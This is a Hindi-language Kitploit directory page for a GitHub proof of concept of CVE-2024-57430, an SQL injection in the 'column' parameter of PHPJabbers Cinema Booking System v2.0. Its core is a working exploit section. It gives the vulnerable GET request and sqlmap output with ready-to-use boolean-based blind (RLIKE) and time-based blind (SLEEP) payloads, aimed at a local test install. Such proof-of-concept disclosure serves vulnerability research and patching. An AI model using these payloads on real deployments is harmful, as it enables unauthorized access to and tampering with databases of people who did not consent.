Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-57430 — CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 SQL इंजेक्शन के प्रति संवेदनशील है, जिससे अनधिकृत डेटा एक्सेस और विशेषाधिकार वृद्धि (privilege escalation) हो सकती है। | Kitploit
उपकरण/GitHubGitHub/ahrixia/cve-2024-57430
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubahrixia/cve-2024-57430

CVE-2024-57430

CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 SQL इंजेक्शन के प्रति संवेदनशील है, जिससे अनधिकृत डेटा एक्सेस और विशेषाधिकार वृद्धि (privilege escalation) हो सकती है।

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-57430

PHPJabbers Cinema Booking System v2.0 के pjActionGetUser फ़ंक्शन में एक SQL injection भेद्यता हमलावरों को column पैरामीटर के माध्यम से डेटाबेस क्वेरीज़ में हेरफेर करने की अनुमति देती है। इस दोष का शोषण करने से अनधिकृत जानकारी का खुलासा, विशेषाधिकार वृद्धि, या डेटाबेस में हेरफेर हो सकता है।

Vulnerable Parameter: column

प्रभाव:

SQL injection संवेदनशील जानकारी तक अनधिकृत पहुंच, डेटाबेस संशोधन, और यहां तक कि डेटाबेस सर्वर के पूर्ण समझौते का कारण बन सकता है। यह एप्लिकेशन की गोपनीयता, अखंडता और उपलब्धता के लिए एक गंभीर खतरा पैदा करता है।

शोषण - प्रमाण अवधारणा (POC)

SQL Injection

GET अनुरोध URL पर: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10

SQLMAP column पर

root@kitploit:~
Parameter: #1* (URI)
  Type: boolean-based blind
  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10

  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10
टूल डाउनलोड करें